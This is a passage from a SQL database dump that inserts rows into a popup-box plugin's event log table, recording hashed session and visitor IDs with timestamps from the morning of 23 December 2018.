(41673, '6ba1bf1d08d7fea741a5e4a650bb17aa', '196ae7616c94df27', 0, 2, 1, '2018-12-23 07:34:23'),
(41674, '21a262c3664d96d8076cf6c458cbeac6', '0590f2c35fb16469', 0, 2, 1, '2018-12-23 07:34:41'),
(41675, 'a5b8a8096af7806eb65de69662e90950', 'a02a3c80cccf2b95', 0, 2, 1, '2018-12-23 07:34:42'),
(41676, 'a5b8a8096af7806eb65de69662e90950', 'a02a3c80cccf2b95', 0, 2, 1, '2018-12-23 07:34:55'),
(41677, 'af005c59a4337f775daddafa05fc39b6', 'ee048a80ed202af2', 0, 2, 1, '2018-12-23 07:34:58'),
(41678, 'ee842d7ce336375cba23d59f1ae0bb18', 'cbceb37e4a508af3', 0, 2, 1, '2018-12-23 07:35:03'),
(41679, '6ba1bf1d08d7fea741a5e4a650bb17aa', '196ae7616c94df27', 0, 2, 1, '2018-12-23 07:35:09'),
(41680, '9cc595c6989c3ddd3d99b9cd385a9c14', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-12-23 07:35:11'),
(41681, 'af005c59a4337f775daddafa05fc39b6', 'ee048a80ed202af2', 0, 2, 1, '2018-12-23 07:35:13'),
(41682, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2018-12-23 07:35:13'),
(41683, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2018-12-23 07:35:18'),
(41684, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 07:35:18'),
(41685, 'af005c59a4337f775daddafa05fc39b6', 'ee048a80ed202af2', 0, 2, 1, '2018-12-23 07:35:26'),
(41686, 'ee842d7ce336375cba23d59f1ae0bb18', 'cbceb37e4a508af3', 0, 2, 1, '2018-12-23 07:35:47'),
(41687, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 07:35:52'),
(41688, 'ee842d7ce336375cba23d59f1ae0bb18', 'cbceb37e4a508af3', 0, 2, 1, '2018-12-23 07:36:00'),
(41689, 'af005c59a4337f775daddafa05fc39b6', 'ee048a80ed202af2', 0, 2, 1, '2018-12-23 07:36:23'),
(41690, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2018-12-23 07:36:41'),
(41691, '3d3d268f2ec97bfe908fb4130fbafba6', 'a78518b8ca3da8be', 0, 2, 1, '2018-12-23 07:36:43'),
(41692, '852e5202fc47d583bd0aba7469b05a3d', '32b169e936bbe5df', 0, 2, 1, '2018-12-23 07:36:53'),
(41693, 'af005c59a4337f775daddafa05fc39b6', 'ee048a80ed202af2', 0, 2, 1, '2018-12-23 07:37:10'),
(41694, '2cee475ff086aec68ae26b37ac713801', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-23 07:37:21'),
(41695, '2cee475ff086aec68ae26b37ac713801', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-23 07:37:25'),
(41696, 'ee842d7ce336375cba23d59f1ae0bb18', 'cbceb37e4a508af3', 0, 2, 1, '2018-12-23 07:37:29'),
(41697, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 07:37:43'),
(41698, '8c3ba2aa5fd84bbc8ca465482779dfed', '74aba437eea39f30', 0, 2, 1, '2018-12-23 07:38:42'),
(41699, '083baad17a2d7e08073fedfd9db64731', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-23 07:39:51'),
(41700, '334efd8a9f3ac58fdaf15de891b36fcb', 'c1205afb68feabf0', 0, 2, 1, '2018-12-23 07:40:03'),
(41701, '159014ef2721b738dfc5dafa6cd80a6a', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-23 07:40:10'),
(41702, '466de38780c1f39f3599d055c7eb30f0', '5c88095d7f308e7d', 0, 2, 1, '2018-12-23 07:41:15');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(41703, '8c3ba2aa5fd84bbc8ca465482779dfed', '74aba437eea39f30', 0, 2, 1, '2018-12-23 07:42:00'),
(41704, 'f9819bb9906dfdfea97696b718bd0f1c', '546887b39507976e', 0, 2, 1, '2018-12-23 07:42:00'),
(41705, '414f519a1244b84809953c9da6edfa32', '52aa9e0502f94486', 0, 2, 1, '2018-12-23 07:42:01'),
(41706, '414f519a1244b84809953c9da6edfa32', '52aa9e0502f94486', 0, 2, 1, '2018-12-23 07:42:11'),
(41707, '466de38780c1f39f3599d055c7eb30f0', '5c88095d7f308e7d', 0, 2, 1, '2018-12-23 07:42:38'),
(41708, '1897376f55bb3dd242185201f63dfaf1', '6521fe834dce4d43', 0, 2, 1, '2018-12-23 07:43:01'),
(41709, 'cc57a8c7828eb4cd9c75c1978688a52f', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-23 07:43:11'),
(41710, 'f9819bb9906dfdfea97696b718bd0f1c', '546887b39507976e', 0, 2, 1, '2018-12-23 07:43:50'),
(41711, 'b87bf52b755d101035a9df7144046ec4', '37c6d85bc2eb625e', 0, 2, 1, '2018-12-23 07:43:58'),
(41712, '66e259c1dc0c4e19c529c3f44db947ec', '8cf1f4b8bd4cc593', 0, 2, 1, '2018-12-23 07:45:06'),
(41713, 'f9819bb9906dfdfea97696b718bd0f1c', '546887b39507976e', 0, 2, 1, '2018-12-23 07:45:07'),
(41714, '2cee475ff086aec68ae26b37ac713801', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-23 07:45:17'),
(41715, '334efd8a9f3ac58fdaf15de891b36fcb', 'c1205afb68feabf0', 0, 2, 1, '2018-12-23 07:45:30'),
(41716, '3ad1cb833da0626cbcbfaa5ab5df0934', '7501b42c35accff7', 0, 2, 1, '2018-12-23 07:45:37'),
(41717, 'acabbf306bce4af58f9870d92fa3ba78', '57587ada79ea2aa6', 0, 2, 1, '2018-12-23 07:45:55'),
(41718, '3c915334bff21599d56f6816c15cfe3a', '503a514a8daa32a7', 0, 2, 1, '2018-12-23 07:45:56'),
(41719, '159014ef2721b738dfc5dafa6cd80a6a', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-23 07:45:59'),
(41720, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 07:46:04'),
(41721, '466de38780c1f39f3599d055c7eb30f0', '5c88095d7f308e7d', 0, 2, 1, '2018-12-23 07:47:27'),
(41722, 'cdfb48b1a9706b11e24cf11709ceb866', '29608a328df169fa', 0, 2, 1, '2018-12-23 07:47:33'),
(41723, 'c4b68bf64f470d8c2939d9717747e491', 'd57c6a47a6711062', 0, 2, 1, '2018-12-23 07:47:55'),
(41724, 'd969ad4d045ccc6513a978b88d481635', 'e006c0ea7e3f02fd', 0, 2, 1, '2018-12-23 07:49:57'),
(41725, '73a7155fb8c7822ca8c517718e7139e2', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-23 07:50:00'),
(41726, '0b19066425a1b6ab3ff24fcdb181f4b3', '38709a16f5a443f4', 0, 2, 1, '2018-12-23 07:50:40'),
(41727, '2fd6e0c29ad498f5ed56a08beba91368', '57a9d45c2fb49483', 0, 2, 1, '2018-12-23 07:51:25'),
(41728, '2fd6e0c29ad498f5ed56a08beba91368', '57a9d45c2fb49483', 0, 2, 1, '2018-12-23 07:51:50'),
(41729, '9bd3f784a8bfeb0adfa8071fdacd4a81', '46713cac27a94b83', 0, 2, 1, '2018-12-23 07:52:28'),
(41730, '3ad1cb833da0626cbcbfaa5ab5df0934', '7501b42c35accff7', 0, 2, 1, '2018-12-23 07:52:53'),
(41731, '2fd6e0c29ad498f5ed56a08beba91368', '57a9d45c2fb49483', 0, 2, 1, '2018-12-23 07:53:31'),
(41732, '334efd8a9f3ac58fdaf15de891b36fcb', 'c1205afb68feabf0', 0, 2, 1, '2018-12-23 07:53:57'),
(41733, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 07:54:02'),
(41734, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 07:54:03'),
(41735, '9bd3f784a8bfeb0adfa8071fdacd4a81', '46713cac27a94b83', 0, 2, 1, '2018-12-23 07:54:05'),
(41736, '0b19066425a1b6ab3ff24fcdb181f4b3', '38709a16f5a443f4', 0, 2, 1, '2018-12-23 07:54:33'),
(41737, '638ba8219ea670d6c807de7e2870c1b3', '0d6d214e577e9800', 0, 2, 1, '2018-12-23 07:54:47'),
(41738, '334efd8a9f3ac58fdaf15de891b36fcb', 'c1205afb68feabf0', 0, 2, 1, '2018-12-23 07:54:59'),
(41739, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 07:55:19'),
(41740, 'ad08d06d5250e23c1a2cf5ba72fb610f', 'd50d7502174878db', 0, 2, 1, '2018-12-23 07:55:21'),
(41741, 'f9819bb9906dfdfea97696b718bd0f1c', '546887b39507976e', 0, 2, 1, '2018-12-23 07:55:26'),
(41742, '334efd8a9f3ac58fdaf15de891b36fcb', 'c1205afb68feabf0', 0, 2, 1, '2018-12-23 07:56:07'),
(41743, '3ad1cb833da0626cbcbfaa5ab5df0934', '7501b42c35accff7', 0, 2, 1, '2018-12-23 07:56:15'),
(41744, 'ad08d06d5250e23c1a2cf5ba72fb610f', 'd50d7502174878db', 0, 2, 1, '2018-12-23 07:56:18'),
(41745, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 07:56:22'),
(41746, 'b87bf52b755d101035a9df7144046ec4', '37c6d85bc2eb625e', 0, 2, 1, '2018-12-23 07:56:33'),
(41747, '2fd6e0c29ad498f5ed56a08beba91368', '57a9d45c2fb49483', 0, 2, 1, '2018-12-23 07:56:34'),
(41748, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 07:56:37'),
(41749, '8c3ba2aa5fd84bbc8ca465482779dfed', '74aba437eea39f30', 0, 2, 1, '2018-12-23 07:56:37'),
(41750, 'f9819bb9906dfdfea97696b718bd0f1c', '546887b39507976e', 0, 2, 1, '2018-12-23 07:57:07'),
(41751, '171058c0742c5f38d049fb57aa5ce551', '65fb1a08fe2b5aab', 0, 2, 1, '2018-12-23 07:57:07'),
(41752, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 07:57:09'),
(41753, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-12-23 07:57:21'),
(41754, '334efd8a9f3ac58fdaf15de891b36fcb', 'c1205afb68feabf0', 0, 2, 1, '2018-12-23 07:57:25'),
(41755, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 07:57:28'),
(41756, '3975eaa726e6a2766e3f2407664947bf', '6e117bd555667400', 0, 2, 1, '2018-12-23 07:57:36'),
(41757, '334efd8a9f3ac58fdaf15de891b36fcb', 'c1205afb68feabf0', 0, 2, 1, '2018-12-23 07:57:45'),
(41758, 'c6a418f044660f775cf89639d63b572d', 'f52a42a05787db8d', 0, 2, 1, '2018-12-23 07:57:51'),
(41759, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-12-23 07:57:51'),
(41760, '70ac1692195c32cb6a2ce944e99fd4a5', '4c07673592205f17', 0, 2, 1, '2018-12-23 07:58:09'),
(41761, '0b19066425a1b6ab3ff24fcdb181f4b3', '38709a16f5a443f4', 0, 2, 1, '2018-12-23 07:58:36'),
(41762, '2779777571e2f3bdd12f9f70b6585b06', '9a5016d6ccef014c', 0, 2, 1, '2018-12-23 07:58:52'),
(41763, '334efd8a9f3ac58fdaf15de891b36fcb', 'c1205afb68feabf0', 0, 2, 1, '2018-12-23 07:59:09'),
(41764, '0e91914bb5c5a9cf93dff35d366dde88', 'fda985193413b262', 0, 2, 1, '2018-12-23 07:59:09'),
(41765, '334efd8a9f3ac58fdaf15de891b36fcb', 'c1205afb68feabf0', 0, 2, 1, '2018-12-23 07:59:19'),
(41766, 'ad08d06d5250e23c1a2cf5ba72fb610f', 'd50d7502174878db', 0, 2, 1, '2018-12-23 07:59:44'),
(41767, '3975eaa726e6a2766e3f2407664947bf', '6e117bd555667400', 0, 2, 1, '2018-12-23 07:59:53'),
(41768, '3975eaa726e6a2766e3f2407664947bf', '6e117bd555667400', 0, 2, 1, '2018-12-23 08:00:17'),
(41769, 'cdfb48b1a9706b11e24cf11709ceb866', '29608a328df169fa', 0, 2, 1, '2018-12-23 08:00:47'),
(41770, '4b33b86d73f02be3b9964e3e6fcedc22', '7fc30e8d7ee02d6c', 0, 2, 1, '2018-12-23 08:00:47'),
(41771, '852e5202fc47d583bd0aba7469b05a3d', '32b169e936bbe5df', 0, 2, 1, '2018-12-23 08:00:54'),
(41772, '4b33b86d73f02be3b9964e3e6fcedc22', '7fc30e8d7ee02d6c', 0, 2, 1, '2018-12-23 08:01:02'),
(41773, 'cdfb48b1a9706b11e24cf11709ceb866', '29608a328df169fa', 0, 2, 1, '2018-12-23 08:01:03'),
(41774, 'ee842d7ce336375cba23d59f1ae0bb18', 'cbceb37e4a508af3', 0, 2, 1, '2018-12-23 08:01:28'),
(41775, '1897376f55bb3dd242185201f63dfaf1', '6521fe834dce4d43', 0, 2, 1, '2018-12-23 08:05:26'),
(41776, '334efd8a9f3ac58fdaf15de891b36fcb', 'c1205afb68feabf0', 0, 2, 1, '2018-12-23 08:05:32'),
(41777, '3975eaa726e6a2766e3f2407664947bf', '6e117bd555667400', 0, 2, 1, '2018-12-23 08:05:36'),
(41778, '334efd8a9f3ac58fdaf15de891b36fcb', 'c1205afb68feabf0', 0, 2, 1, '2018-12-23 08:05:48'),
(41779, '0e91914bb5c5a9cf93dff35d366dde88', 'fda985193413b262', 0, 2, 1, '2018-12-23 08:05:59'),
(41780, '083baad17a2d7e08073fedfd9db64731', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-23 08:06:42'),
(41781, '9527e3c2d82e0b78f918c6ea5cb9431d', '9f3a675c28cf1b78', 0, 2, 1, '2018-12-23 08:08:22'),
(41782, 'b6f499701b44089c5dbff82a8d8e0300', '5d4ff34b31a3add2', 0, 2, 1, '2018-12-23 08:08:29'),
(41783, '4b33b86d73f02be3b9964e3e6fcedc22', '7fc30e8d7ee02d6c', 0, 2, 1, '2018-12-23 08:09:31'),
(41784, 'b2c17c711c52e9a3bfbe4c02a1a78f4f', 'a4d896a6fb2e7ba8', 0, 2, 1, '2018-12-23 08:09:55'),
(41785, '53863dd24c62289d002185f0d01ee5fe', 'd15e502dab3a2ab1', 0, 2, 1, '2018-12-23 08:10:23'),
(41786, '343ed3f54f6588341e1c61079fdc9116', 'f6269ce34ab6a362', 0, 2, 1, '2018-12-23 08:10:29'),
(41787, 'b2c17c711c52e9a3bfbe4c02a1a78f4f', 'a4d896a6fb2e7ba8', 0, 2, 1, '2018-12-23 08:11:19'),
(41788, '0a4070fe9f133d9c519e5be716cb3f42', 'f4310bcd3a0b59ad', 0, 2, 1, '2018-12-23 08:11:19'),
(41789, 'b2c17c711c52e9a3bfbe4c02a1a78f4f', 'a4d896a6fb2e7ba8', 0, 2, 1, '2018-12-23 08:11:37'),
(41790, '4b33b86d73f02be3b9964e3e6fcedc22', '7fc30e8d7ee02d6c', 0, 2, 1, '2018-12-23 08:12:01'),
(41791, 'ca11f6d0170ac0dbf343444e29e57eb1', '84ee944e9bc9f866', 0, 2, 1, '2018-12-23 08:12:33'),
(41792, '0a4070fe9f133d9c519e5be716cb3f42', 'f4310bcd3a0b59ad', 0, 2, 1, '2018-12-23 08:12:39'),
(41793, '4b33b86d73f02be3b9964e3e6fcedc22', '7fc30e8d7ee02d6c', 0, 2, 1, '2018-12-23 08:13:07'),
(41794, '686c9d40e86275d06df24f88d8a9a782', '19ac418837a1bfb6', 0, 2, 1, '2018-12-23 08:14:23'),
(41795, 'a84d63f83f127545bd6b164bbde42f9b', 'ea9410bf7dd63565', 0, 2, 1, '2018-12-23 08:14:37'),
(41796, '343ed3f54f6588341e1c61079fdc9116', 'f6269ce34ab6a362', 0, 2, 1, '2018-12-23 08:14:45'),
(41797, '343ed3f54f6588341e1c61079fdc9116', 'f6269ce34ab6a362', 0, 2, 1, '2018-12-23 08:15:53'),
(41798, 'a4bdfea5dbfe4d1a4e90f14bd0e26bab', '90d45a59b7b34636', 0, 2, 1, '2018-12-23 08:16:57'),
(41799, '082a0c626d073290b620069dda4774ff', '51df446c19685386', 0, 2, 1, '2018-12-23 08:18:26'),
(41800, 'a4bdfea5dbfe4d1a4e90f14bd0e26bab', '90d45a59b7b34636', 0, 2, 1, '2018-12-23 08:20:11'),
(41801, 'cc57a8c7828eb4cd9c75c1978688a52f', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-23 08:21:07'),
(41802, 'ca11f6d0170ac0dbf343444e29e57eb1', '84ee944e9bc9f866', 0, 2, 1, '2018-12-23 08:22:05'),
(41803, 'a4bdfea5dbfe4d1a4e90f14bd0e26bab', '90d45a59b7b34636', 0, 2, 1, '2018-12-23 08:22:13'),
(41804, '13a9b68a48709b15953e7553ea3ca9b9', 'f649a5f995dbfc20', 0, 2, 1, '2018-12-23 08:22:56'),
(41805, '49522149848bb3415006f9c3c45eefd9', 'c858904cdd51199c', 0, 2, 1, '2018-12-23 08:23:08'),
(41806, 'cc57a8c7828eb4cd9c75c1978688a52f', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-23 08:23:16'),
(41807, '49522149848bb3415006f9c3c45eefd9', 'c858904cdd51199c', 0, 2, 1, '2018-12-23 08:24:09'),
(41808, '00578782f8432ca2f932bfaeced08652', '33eb4cd5ae031811', 0, 2, 1, '2018-12-23 08:26:21'),
(41809, '00578782f8432ca2f932bfaeced08652', '33eb4cd5ae031811', 0, 2, 1, '2018-12-23 08:26:34'),
(41810, '8c3ba2aa5fd84bbc8ca465482779dfed', '74aba437eea39f30', 0, 2, 1, '2018-12-23 08:27:12'),
(41811, '0b92ab88cb9c336735a8864a97e18ed5', '6ec4b4f916b8de26', 0, 2, 1, '2018-12-23 08:28:18'),
(41812, '169b6a8499f270839b8176d84b004d2a', '33089a3b34e40302', 0, 2, 1, '2018-12-23 08:28:43'),
(41813, '912b8984ccef0a2939f1d72298727d1e', 'fbf0576065758144', 0, 2, 1, '2018-12-23 08:28:56'),
(41814, '383912ac1aff5dd4c7303895d8b124d2', '960d12b6c14f65ca', 0, 2, 1, '2018-12-23 08:29:50'),
(41815, '383912ac1aff5dd4c7303895d8b124d2', '960d12b6c14f65ca', 0, 2, 1, '2018-12-23 08:30:05'),
(41816, 'a4bdfea5dbfe4d1a4e90f14bd0e26bab', '90d45a59b7b34636', 0, 2, 1, '2018-12-23 08:30:09'),
(41817, '229e306b31fcc694f468cb8d62b22449', '152dd36b7ae63404', 0, 2, 1, '2018-12-23 08:30:33'),
(41818, '514f0170222f4ed6a78e61add82e482b', '814e14b432590743', 0, 2, 1, '2018-12-23 08:30:50'),
(41819, '514f0170222f4ed6a78e61add82e482b', '814e14b432590743', 0, 2, 1, '2018-12-23 08:31:05'),
(41820, '082a0c626d073290b620069dda4774ff', '51df446c19685386', 0, 2, 1, '2018-12-23 08:33:27'),
(41821, 'cdfb48b1a9706b11e24cf11709ceb866', '29608a328df169fa', 0, 2, 1, '2018-12-23 08:34:10'),
(41822, 'ce88789ce06c016dd57ca1d507e7c649', 'fcaa3c8d44082e09', 0, 2, 1, '2018-12-23 08:35:20'),
(41823, 'ba3c32a1c19ccdb6ce56849f3e89f5d4', '84ee944e9bc9f866', 0, 2, 1, '2018-12-23 08:37:31'),
(41824, 'ba3c32a1c19ccdb6ce56849f3e89f5d4', '84ee944e9bc9f866', 0, 2, 1, '2018-12-23 08:38:16'),
(41825, '4ace707194d9dc94c27e2056ea47b268', '67d9c3341cc72093', 0, 2, 1, '2018-12-23 08:40:10'),
(41826, '49522149848bb3415006f9c3c45eefd9', 'c858904cdd51199c', 0, 2, 1, '2018-12-23 08:42:02'),
(41827, 'ba3c32a1c19ccdb6ce56849f3e89f5d4', '84ee944e9bc9f866', 0, 2, 1, '2018-12-23 08:42:09'),
(41828, 'ba3c32a1c19ccdb6ce56849f3e89f5d4', '84ee944e9bc9f866', 0, 2, 1, '2018-12-23 08:43:27'),
(41829, 'ba3c32a1c19ccdb6ce56849f3e89f5d4', '84ee944e9bc9f866', 0, 2, 1, '2018-12-23 08:43:42'),
(41830, 'ba3c32a1c19ccdb6ce56849f3e89f5d4', '84ee944e9bc9f866', 0, 2, 1, '2018-12-23 08:43:50'),
(41831, '1dd80c38ddefeb706882f7cab88f7265', '0d8cc63ce25c98b4', 0, 2, 1, '2018-12-23 08:44:12'),
(41832, 'ba3c32a1c19ccdb6ce56849f3e89f5d4', '84ee944e9bc9f866', 0, 2, 1, '2018-12-23 08:44:42'),
(41833, 'fc1f1b622f9221c272b14488a0efae8f', '1e9828e4ea92fe16', 0, 2, 1, '2018-12-23 08:45:29'),
(41834, '3330e9e5d4d7f316e5016f396886a8f9', 'a0235fe3d2bbcf97', 0, 2, 1, '2018-12-23 08:45:51'),
(41835, 'b0843cfc48a9beff90e84537bcd92157', '074ec8007ba74449', 0, 2, 1, '2018-12-23 08:47:21'),
(41836, '114eebcff1bbe881e8870a47825984f9', '6ec4b4f916b8de26', 0, 2, 1, '2018-12-23 08:49:48'),
(41837, 'a0c0d04b6a3d7412806dffa5738949f2', '27d3b62cdd82d36e', 0, 2, 1, '2018-12-23 08:50:30'),
(41838, '67576ebf0e1e879bfa57162415e51a10', 'cacd968def9e6b3f', 0, 2, 1, '2018-12-23 08:50:36'),
(41839, '88c91e5e9a510bc31d4e0c59b26f10a5', 'fc47cbdbdf270601', 0, 2, 1, '2018-12-23 08:51:00'),
(41840, '88c91e5e9a510bc31d4e0c59b26f10a5', 'fc47cbdbdf270601', 0, 2, 1, '2018-12-23 08:52:56'),
(41841, 'ca05704156244ae56ece8357da333a24', '6f8cac538d104962', 0, 2, 1, '2018-12-23 08:53:11'),
(41842, 'a4bdfea5dbfe4d1a4e90f14bd0e26bab', '90d45a59b7b34636', 0, 2, 1, '2018-12-23 08:53:19'),
(41843, 'ba3c32a1c19ccdb6ce56849f3e89f5d4', '84ee944e9bc9f866', 0, 2, 1, '2018-12-23 08:59:27'),
(41844, '645ce59cca90bb349056245e7a64ff79', 'a560a7764f7a7dcb', 0, 2, 1, '2018-12-23 09:00:28'),
(41845, '514f0170222f4ed6a78e61add82e482b', '814e14b432590743', 0, 2, 1, '2018-12-23 09:04:43'),
(41846, '45cad11a3239768aa61a30622ac1db75', '4ec4360c2d0b7d93', 0, 2, 1, '2018-12-23 09:05:04'),
(41847, 'd3da1f97aa88a86f29a57ef244a445e8', 'cd739182be9070e6', 0, 2, 1, '2018-12-23 09:06:51'),
(41848, '45cad11a3239768aa61a30622ac1db75', '4ec4360c2d0b7d93', 0, 2, 1, '2018-12-23 09:07:30'),
(41849, '45cad11a3239768aa61a30622ac1db75', '4ec4360c2d0b7d93', 0, 2, 1, '2018-12-23 09:07:52'),
(41850, '45cad11a3239768aa61a30622ac1db75', '4ec4360c2d0b7d93', 0, 2, 1, '2018-12-23 09:08:11'),
(41851, '435dd571ba864ef6d61189bed7186b45', 'eefe72222194052a', 0, 2, 1, '2018-12-23 09:08:36'),
(41852, '435dd571ba864ef6d61189bed7186b45', 'eefe72222194052a', 0, 2, 1, '2018-12-23 09:08:43'),
(41853, '435dd571ba864ef6d61189bed7186b45', 'eefe72222194052a', 0, 2, 1, '2018-12-23 09:09:01'),
(41854, '30ab4854c6b62ea30159de45e1880a4d', 'd6881a793a5d4cd8', 0, 2, 1, '2018-12-23 09:11:05'),
(41855, 'd3da1f97aa88a86f29a57ef244a445e8', 'cd739182be9070e6', 0, 2, 1, '2018-12-23 09:12:12'),
(41856, '1f56dab7fd2380259cba46152c8bd867', 'd6cc237feb026902', 0, 2, 1, '2018-12-23 09:12:55'),
(41857, '6352877b92b2c339d99b2690fd5f3595', 'dc291edf6d8b0b75', 0, 2, 1, '2018-12-23 09:13:14'),
(41858, '1f56dab7fd2380259cba46152c8bd867', 'd6cc237feb026902', 0, 2, 1, '2018-12-23 09:13:30'),
(41859, '1f56dab7fd2380259cba46152c8bd867', 'd6cc237feb026902', 0, 2, 1, '2018-12-23 09:13:47'),
(41860, '1f56dab7fd2380259cba46152c8bd867', 'd6cc237feb026902', 0, 2, 1, '2018-12-23 09:14:15'),
(41861, 'ba3c32a1c19ccdb6ce56849f3e89f5d4', '84ee944e9bc9f866', 0, 2, 1, '2018-12-23 09:14:18'),
(41862, 'da981d39a8412cec6d63b62a189d7b88', '790fbcccb3362dd5', 0, 2, 1, '2018-12-23 09:14:21'),
(41863, '1f56dab7fd2380259cba46152c8bd867', 'd6cc237feb026902', 0, 2, 1, '2018-12-23 09:14:57'),
(41864, '1f56dab7fd2380259cba46152c8bd867', 'd6cc237feb026902', 0, 2, 1, '2018-12-23 09:15:02'),
(41865, 'a92d42cd75296ad34bad7321710bcf82', '7af6cb768c9e29e8', 0, 2, 1, '2018-12-23 09:15:17'),
(41866, '686c9d40e86275d06df24f88d8a9a782', '19ac418837a1bfb6', 0, 2, 1, '2018-12-23 09:15:20'),
(41867, '45cad11a3239768aa61a30622ac1db75', '4ec4360c2d0b7d93', 0, 2, 1, '2018-12-23 09:15:29'),
(41868, '1f56dab7fd2380259cba46152c8bd867', 'd6cc237feb026902', 0, 2, 1, '2018-12-23 09:15:44'),
(41869, '514f0170222f4ed6a78e61add82e482b', '814e14b432590743', 0, 2, 1, '2018-12-23 09:16:04'),
(41870, '1f56dab7fd2380259cba46152c8bd867', 'd6cc237feb026902', 0, 2, 1, '2018-12-23 09:16:05'),
(41871, '1f56dab7fd2380259cba46152c8bd867', 'd6cc237feb026902', 0, 2, 1, '2018-12-23 09:16:15'),
(41872, 'ba3c32a1c19ccdb6ce56849f3e89f5d4', '84ee944e9bc9f866', 0, 2, 1, '2018-12-23 09:16:31'),
(41873, '1f56dab7fd2380259cba46152c8bd867', 'd6cc237feb026902', 0, 2, 1, '2018-12-23 09:16:32'),
(41874, '8a82875d9889926ca9083ad423a84055', 'b7f3f6be23503542', 0, 2, 1, '2018-12-23 09:16:45'),
(41875, '1f56dab7fd2380259cba46152c8bd867', 'd6cc237feb026902', 0, 2, 1, '2018-12-23 09:16:48'),
(41876, '1f56dab7fd2380259cba46152c8bd867', 'd6cc237feb026902', 0, 2, 1, '2018-12-23 09:16:51'),
(41877, '45cad11a3239768aa61a30622ac1db75', '4ec4360c2d0b7d93', 0, 2, 1, '2018-12-23 09:16:56'),
(41878, '8a82875d9889926ca9083ad423a84055', 'b7f3f6be23503542', 0, 2, 1, '2018-12-23 09:16:56'),
(41879, '45cad11a3239768aa61a30622ac1db75', '4ec4360c2d0b7d93', 0, 2, 1, '2018-12-23 09:17:15'),
(41880, 'abec58cbeaf7f205c514986bcf3d2898', '220b6bed49713ca3', 0, 2, 1, '2018-12-23 09:17:20'),
(41881, '6352877b92b2c339d99b2690fd5f3595', 'dc291edf6d8b0b75', 0, 2, 1, '2018-12-23 09:17:44'),
(41882, 'ce996412bcd236867e11bafdf47cdc82', 'b6169a438d71e404', 0, 2, 1, '2018-12-23 09:17:54'),
(41883, '941aa6b0432880e65e3422dcd5097db3', '2034f09284a4c7ca', 0, 2, 1, '2018-12-23 09:18:09'),
(41884, '595a96312bcd0926ace1fd23c890ba60', 'fc290d8bf25d1be0', 0, 2, 1, '2018-12-23 09:18:12'),
(41885, 'ce996412bcd236867e11bafdf47cdc82', 'b6169a438d71e404', 0, 2, 1, '2018-12-23 09:18:33'),
(41886, '6352877b92b2c339d99b2690fd5f3595', 'dc291edf6d8b0b75', 0, 2, 1, '2018-12-23 09:18:56'),
(41887, '279b98c8a456af1109f98c1b30dac228', 'f8f70c95a9dd1c3e', 0, 2, 1, '2018-12-23 09:19:03'),
(41888, '6352877b92b2c339d99b2690fd5f3595', 'dc291edf6d8b0b75', 0, 2, 1, '2018-12-23 09:20:04'),
(41889, '2789ffb50579aa94357f8a1e767c10fe', '7a1e3705a4507af9', 0, 2, 1, '2018-12-23 09:22:33'),
(41890, '5d658f5e0f3a45dd67da42ef372d0d87', '3bd36d6429a9f245', 0, 2, 1, '2018-12-23 09:22:59'),
(41891, '8a82875d9889926ca9083ad423a84055', 'b7f3f6be23503542', 0, 2, 1, '2018-12-23 09:23:16'),
(41892, '083baad17a2d7e08073fedfd9db64731', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-23 09:23:29'),
(41893, 'c6d6fd8b2cbf1a0c4299f2195166a634', 'd962df27d9158431', 0, 2, 1, '2018-12-23 09:23:42'),
(41894, '8a82875d9889926ca9083ad423a84055', 'b7f3f6be23503542', 0, 2, 1, '2018-12-23 09:23:45'),
(41895, '1b736fec6aab2e8e45fa0f82be57e616', 'fcaa3c8d44082e09', 0, 2, 1, '2018-12-23 09:25:17'),
(41896, '45cad11a3239768aa61a30622ac1db75', '4ec4360c2d0b7d93', 0, 2, 1, '2018-12-23 09:25:19'),
(41897, '31274d4a0f33d42f23b5cb9db1769b71', 'b2bafb74467116e9', 0, 2, 1, '2018-12-23 09:25:42'),
(41898, 'be84fb80f40c4a12f347fa5cadb918e7', 'e2f81c440b409e70', 0, 2, 1, '2018-12-23 09:27:04'),
(41899, '0bac0f11878628a42c6034d4e25ed248', '47009d7b5da44c9d', 0, 2, 1, '2018-12-23 09:27:12'),
